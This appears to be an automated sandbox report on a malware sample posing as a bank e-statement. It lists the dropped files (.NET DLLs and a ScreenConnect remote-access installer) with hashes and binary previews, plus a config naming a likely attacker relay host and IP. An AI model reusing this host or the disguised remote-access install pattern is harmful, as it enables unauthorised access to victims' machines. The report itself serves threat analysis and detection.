                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):4.62694170304723
                                                                    Encrypted:false
                                                                    SSDEEP:768:sqbC2wmdVdX9Y6BCH+C/FEQl2ifnxwr02Gy/G4Xux+bgHGvLw4:sAtXPC/Cifnxs02Gyu4Xu0MeR
                                                                    MD5:77BE59B3DDEF06F08CAA53F0911608A5
                                                                    SHA1:A3B20667C714E88CC11E845975CD6A3D6410E700
                                                                    SHA-256:9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
                                                                    SHA-512:C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ...............................$....@....................................O.................................................................................... ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):36864
                                                                    Entropy (8bit):4.340550904466943
                                                                    Encrypted:false
                                                                    SSDEEP:384:GqJxldkxhW9N5u8IALLU0X9Z1kTOPJlqE:GqJxl6xsPIA9COxlqE
                                                                    MD5:4717BCC62EB45D12FFBED3A35BA20E25
                                                                    SHA1:DA6324A2965C93B70FC9783A44F869A934A9CAF7
                                                                    SHA-256:E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
                                                                    SHA-512:BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0..`... .......~... ........... ....................................@.................................X~..O................................... }............................................... ............... ..H............text....^... ...`.................. ..`.rsrc................p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):57344
                                                                    Entropy (8bit):4.657268358041957
                                                                    Encrypted:false
                                                                    SSDEEP:768:BLNru62y+VqB4N5SBcDhDxW7ZkCmX2Qv1Sf0AQdleSBRxf+xUI3:BJ2yUGmh2O11AsleyRxf+xt
                                                                    MD5:A921A2B83B98F02D003D9139FA6BA3D8
                                                                    SHA1:33D67E11AD96F148FD1BFD4497B4A764D6365867
                                                                    SHA-256:548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
                                                                    SHA-512:E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ....................... .......t....@.....................................O...................................`................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):176128
                                                                    Entropy (8bit):5.775360792482692
                                                                    Encrypted:false
                                                                    SSDEEP:3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
                                                                    MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                                                    SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                                                    SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                                                    SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ......~.... ........... ..............................!|....@.................................,...O.................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):548864
                                                                    Entropy (8bit):6.034211651049746
                                                                    Encrypted:false
                                                                    SSDEEP:12288:xC2YKhQCNc6kVTplfWL/YTHUYCBdySISYz:HhE6O7WL/EC
                                                                    MD5:14E7489FFEBBB5A2EA500F796D881AD9
                                                                    SHA1:0323EE0E1FAA4AA0E33FB6C6147290AA71637EBD
                                                                    SHA-256:A2E9752DE49D18E885CBD61B29905983D44B4BC0379A244BFABDAA3188C01F0A
                                                                    SHA-512:2110113240B7D803D8271139E0A2439DBC86AE8719ECD8B132BBDA2520F22DC3F169598C8E966AC9C0A40E617219CB8FE8AAC674904F6A1AE92D4AC1E20627CD
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............." ..0..X...........s... ........... ..............................].....@.................................as..O.......t............................r..8............................................ ............... ..H............text....W... ...X.................. ..`.rsrc...t............Z..............@..@.reloc...............^..............@..B.................s......H........C..,/..................Dr........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):11776
                                                                    Entropy (8bit):5.273875899788767
                                                                    Encrypted:false
                                                                    SSDEEP:192:V8/Qp6lCJuV3jHXtyVNamVNG1YZfCrMmbfHJ7kjvLjbuLd9NEFbM64:y/cBJaLXt2NaheUrMmb/FkjvLjbuZj64
                                                                    MD5:73A24164D8408254B77F3A2C57A22AB4
                                                                    SHA1:EA0215721F66A93D67019D11C4E588A547CC2AD6
                                                                    SHA-256:D727A640723D192AA3ECE213A173381682041CB28D8BD71781524DBAE3DDBF62
                                                                    SHA-512:650D4320D9246AAECD596AC8B540BF7612EC7A8F60ECAA6E9C27B547B751386222AB926D0C915698D0BB20556475DA507895981C072852804F0B42FDDA02B844
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..&...........E... ...`....... ..............................D9....@..................................D..O....`..............................$D..8............................................ ............... ..H............text...4%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............,..............@..B.................E......H........'.......................C........................................(....*^.(.......&...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s.......}.....s....}.....{....r...p(......,h.{....r...p......%...(.....rS..p.(....~....%-.&~..........s....%......(...+%-.&+.(...........s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{.....{....r}..po....(.....{....o....-..{....r...p......(.....*.{....s .....-..o!.......{....r}..p.o
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1721856
                                                                    Entropy (8bit):6.639085961200334
                                                                    Encrypted:false
                                                                    SSDEEP:24576:dx5xeYkYFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:dx5xTkYJkGYYpT0+TFiH7efP
                                                                    MD5:9AD3964BA3AD24C42C567E47F88C82B2
                                                                    SHA1:6B4B581FC4E3ECB91B24EC601DAA0594106BCC5D
                                                                    SHA-256:84A09ED81AFC5FF9A17F81763C044C82A2D9E26F852DE528112153EE9AB041D0
                                                                    SHA-512:CE557A89C0FE6DE59046116C1E262A36BBC3D561A91E44DCDA022BEF72CB75742C8B01BEDCC5B9B999E07D8DE1F94C665DD85D277E981B27B6BFEBEAF9E58097
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y............." ..0..>..........~]... ...`....... ..............................8.....@.................................+]..O....`..|............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc...|....`.......@..............@..@.reloc...............D..............@..B................_]......H.......t...d..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                    Process:C:\Users\user\Desktop\estatement020134230003.exe.virus.exe
                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {F4AC94C9-4954-76D1-AA9E-1F00F1476998}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                    Category:dropped
                                                                    Size (bytes):8241152
                                                                    Entropy (8bit):7.950621141303467
                                                                    Encrypted:false
                                                                    SSDEEP:98304:ywJ4t1h0cG5FGJRPxow8OtwJ4t1h0cG5hwJ4t1h0cG5ywJ4t1h0cG5:PWh0cGwIWh0cGkWh0cG5Wh0cG
                                                                    MD5:DC3E43C8374222B0CA817712249AB784
                                                                    SHA1:4C6754F6296603CB3E452549F943BEACB5783FC3
                                                                    SHA-256:C08D5F6D2483AB89EC0FCB8146DC92512296886DC94CD07742EFE75D7161BB6D
                                                                    SHA-512:96D29B4524F7C3E350640A94E017E77F99144C09276EC1899544FC8078C39B5EB089F307ADD1451A5CB2105CDA1023853C219C2D3A1DF17370BFECFD1B7959BA
                                                                    Malicious:false
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {F4AC94C9-4954-76D1-AA9E-1F00F1476998}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                    Category:dropped
                                                                    Size (bytes):8241152
                                                                    Entropy (8bit):7.950621141303467
                                                                    Encrypted:false
                                                                    SSDEEP:98304:ywJ4t1h0cG5FGJRPxow8OtwJ4t1h0cG5hwJ4t1h0cG5ywJ4t1h0cG5:PWh0cGwIWh0cGkWh0cG5Wh0cG
                                                                    MD5:DC3E43C8374222B0CA817712249AB784
                                                                    SHA1:4C6754F6296603CB3E452549F943BEACB5783FC3
                                                                    SHA-256:C08D5F6D2483AB89EC0FCB8146DC92512296886DC94CD07742EFE75D7161BB6D
                                                                    SHA-512:96D29B4524F7C3E350640A94E017E77F99144C09276EC1899544FC8078C39B5EB089F307ADD1451A5CB2105CDA1023853C219C2D3A1DF17370BFECFD1B7959BA
                                                                    Malicious:false
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {F4AC94C9-4954-76D1-AA9E-1F00F1476998}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                    Category:dropped
                                                                    Size (bytes):8241152
                                                                    Entropy (8bit):7.950621141303467
                                                                    Encrypted:false
                                                                    SSDEEP:98304:ywJ4t1h0cG5FGJRPxow8OtwJ4t1h0cG5hwJ4t1h0cG5ywJ4t1h0cG5:PWh0cGwIWh0cGkWh0cG5Wh0cG
                                                                    MD5:DC3E43C8374222B0CA817712249AB784
                                                                    SHA1:4C6754F6296603CB3E452549F943BEACB5783FC3
                                                                    SHA-256:C08D5F6D2483AB89EC0FCB8146DC92512296886DC94CD07742EFE75D7161BB6D
                                                                    SHA-512:96D29B4524F7C3E350640A94E017E77F99144C09276EC1899544FC8078C39B5EB089F307ADD1451A5CB2105CDA1023853C219C2D3A1DF17370BFECFD1B7959BA
                                                                    Malicious:false
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):423525
                                                                    Entropy (8bit):6.578205439751381
                                                                    Encrypted:false
                                                                    SSDEEP:6144:AuH2aCGw1ST1wQLdqv5uH2aCGw1ST1wQLdqvy:AuH2anwohwQUv5uH2anwohwQUvy
                                                                    MD5:265E1B4DF4EDA64C00A97F4CC2B43F48
                                                                    SHA1:D996CF26B029504240191831661560ABAABCA7A3
                                                                    SHA-256:B769F356C67AC8A46CB707053C739D35E070B404E8C038E49F5762CE1D13772B
                                                                    SHA-512:79E195CCC8699CDD590D5F7F579AE1BA5E7ABDFBE1A51940DE0448CE42A756738B59E0A8294F61A9A8CC43DE4B2E1B4C57B79475515A4F335448D3E68407F0E1
                                                                    Malicious:false
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSIEACA.tmp, Author: Joe Security
                                                                    Preview:...@IXOS.@.....@ln.Y.@.....@.....@.....@.....@.....@......&.{F4AC94C9-4954-76D1-AA9E-1F00F1476998}'.ScreenConnect Client (8d1a70ac1b2b845c)..ScreenConnect.ClientSetup.msi.@.....@.....@.....@......DefaultIcon..&.{F4AC94C9-4954-76D1-AA9E-1F00F1476998}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (8d1a70ac1b2b845c)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{0538C68F-6B94-515B-2F2F-CF0387A3F483}^.C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{3F8D40B9-5B5A-1351-B0FC-58D0F623492D}f.C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{007A566B-98B8-78D8-8988-2721161F84D6}c.C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsFileMa
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):207360
                                                                    Entropy (8bit):6.573348437503042
                                                                    Encrypted:false
                                                                    SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                    MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                    SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                    SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                    SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):207360
                                                                    Entropy (8bit):6.573348437503042
                                                                    Encrypted:false
                                                                    SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                    MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                    SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                    SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                    SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.1709523009326723
                                                                    Encrypted:false
                                                                    SSDEEP:12:JSbX72Fj+AGiLIlHVRpIh/7777777777777777777777777vDHFtw7rl0i8Q:JAQI5wbF
                                                                    MD5:B93B7C8B53C88193BAD83F499537A0D8
                                                                    SHA1:FFFE740E55C26B4CE8CF58B7FC71703A1977B594
                                                                    SHA-256:2C4DCEDD15D35D35148D1EE649627A59D58B2B36493BF5F77DE9DA1828D924A5
                                                                    SHA-512:8CD9107E2FC59331938FDC5F74BD3773E8D948EE4B061ABA52025E5CDB2D33380BB428B77116F70225A7DA75B40A4832AE1191C7D5B65851A78EADD5F4F536E7
                                                                    Malicious:false
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.8171940082154723
                                                                    Encrypted:false
                                                                    SSDEEP:96:dhM1zFTRam5po6fLiJxd+NRBkYlEq2+66KD:81plz5po6+JoBkIz6x
                                                                    MD5:1E014507AEFF453CB65AB2B795B65E0F
                                                                    SHA1:66A6DDF268B0A19D14A3FCF68789D47A559070AC
                                                                    SHA-256:F6115761810043A3BF215C4E4A7A93D240C6C1159F7ADA99CC77D6F60F73CF3F
                                                                    SHA-512:356D72081653BD117D26643CD893C3CA40EEBB508F4A6056C853DABD7D7469CF88D8AE642FA8C0A0CBF879AAB19DAB4968F067E66D7806C8ED8F4FA0D245F82A
                                                                    Malicious:false
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\inprogressinstallinfo.ipi, Author: Joe Security
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:MS Windows icon resource - 3 icons, 16x16 with PNG image data, 16 x 16, 8-bit colormap, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 32 x 32, 1-bit colormap, non-interlaced, 4 bits/pixel
                                                                    Category:dropped
                                                                    Size (bytes):435
                                                                    Entropy (8bit):5.289734780210945
                                                                    Encrypted:false
                                                                    SSDEEP:12:Kvv/7tghWPjScQZ/Ev/739Jgh5TZYR/v/71XfghNeZ:QOZZq9JOz0dONeZ
                                                                    MD5:F34D51C3C14D1B4840AE9FF6B70B5D2F
                                                                    SHA1:C761D3EF26929F173CEB2F8E01C6748EE2249A8A
                                                                    SHA-256:0DD459D166F037BB8E531EB2ECEB2B79DE8DBBD7597B05A03C40B9E23E51357A
                                                                    SHA-512:D6EEB5345A5A049A87BFBFBBBEBFBD9FBAEC7014DA41DB1C706E8B16DDEC31561679AAE9E8A0847098807412BD1306B9616C8E6FCFED8683B4F33BD05ADE38D1
                                                                    Malicious:false
                                                                    Preview:..............z...6... ..............00..........0....PNG........IHDR.............(-.S....PLTE....22.u......tRNS.@..f..."IDATx.c` .0"...$.(......SC..Q8....9b.i.Xa.....IEND.B`..PNG........IHDR... ... .....I......PLTE....22.u......tRNS.@..f...(IDATx.c`...... ... D.......vb.....A`..(.-s...q....IEND.B`..PNG........IHDR...0...0.....m.k.....PLTE....22.u......tRNS.@..f...+IDATx.c` .......Q...S.@..DQu...4...(.}DQD...3x........IEND.B`.
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):360001
                                                                    Entropy (8bit):5.362983343892588
                                                                    Encrypted:false
                                                                    SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgau4:zTtbmkExhMJCIpEh
                                                                    MD5:41B9832122AEDA5C713C88BC61D10105
                                                                    SHA1:1E84B0032A3F03A1DCF53BA7053E1B9501213582
                                                                    SHA-256:A41F10FB9F31A311EFFCD81667BEEA3871243AD4FFF627575ED643C923281686
                                                                    SHA-512:08FCE52ED377FE159A162FFCE519FC05CA0DF7F28B54CF522469CFC0D70418B7056D8C667B1819CA84ECE5402FE59837DD472697CAB895A1E72717BEA2AC61E2
                                                                    Malicious:false
                                                                    Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):55
                                                                    Entropy (8bit):4.306461250274409
                                                                    Encrypted:false
                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                    Malicious:false
                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                    Process:C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:modified
                                                                    Size (bytes):573
                                                                    Entropy (8bit):5.037253842902827
                                                                    Encrypted:false
                                                                    SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOMwM//vXbAa3xT:2dL9hK6E46YPixvH
                                                                    MD5:59F12EAEF2B4717DDF73D4B727ED605C
                                                                    SHA1:4BDA351557D850C27B8411CA58F077A146C28BAB
                                                                    SHA-256:83E0D4C4DB57BAA9701ACD11D6D4565CE138CF279F04E2B53AC65B1B298E2B20
                                                                    SHA-512:09BA1C618F44B1374766327F2F05BFA552E36505854EBF24A428CDD928CC59FB8BBC98190FA6EB2ADD8D0F25CAE5E220DFCE4CB64E2D62112081E26FF2848E7F
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>learnskillboosts.con-ip.com=195.250.25.144-05%2f12%2f2024%2018%3a51%3a26</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                    Process:C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):573
                                                                    Entropy (8bit):5.037253842902827
                                                                    Encrypted:false
                                                                    SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOMwM//vXbAa3xT:2dL9hK6E46YPixvH
                                                                    MD5:59F12EAEF2B4717DDF73D4B727ED605C
                                                                    SHA1:4BDA351557D850C27B8411CA58F077A146C28BAB
                                                                    SHA-256:83E0D4C4DB57BAA9701ACD11D6D4565CE138CF279F04E2B53AC65B1B298E2B20
                                                                    SHA-512:09BA1C618F44B1374766327F2F05BFA552E36505854EBF24A428CDD928CC59FB8BBC98190FA6EB2ADD8D0F25CAE5E220DFCE4CB64E2D62112081E26FF2848E7F
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>learnskillboosts.con-ip.com=195.250.25.144-05%2f12%2f2024%2018%3a51%3a26</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                    Process:C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1590
                                                                    Entropy (8bit):5.363907225770245
                                                                    Encrypted:false
                                                                    SSDEEP:48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
                                                                    MD5:E88F0E3AD82AC5F6557398EBC137B0DE
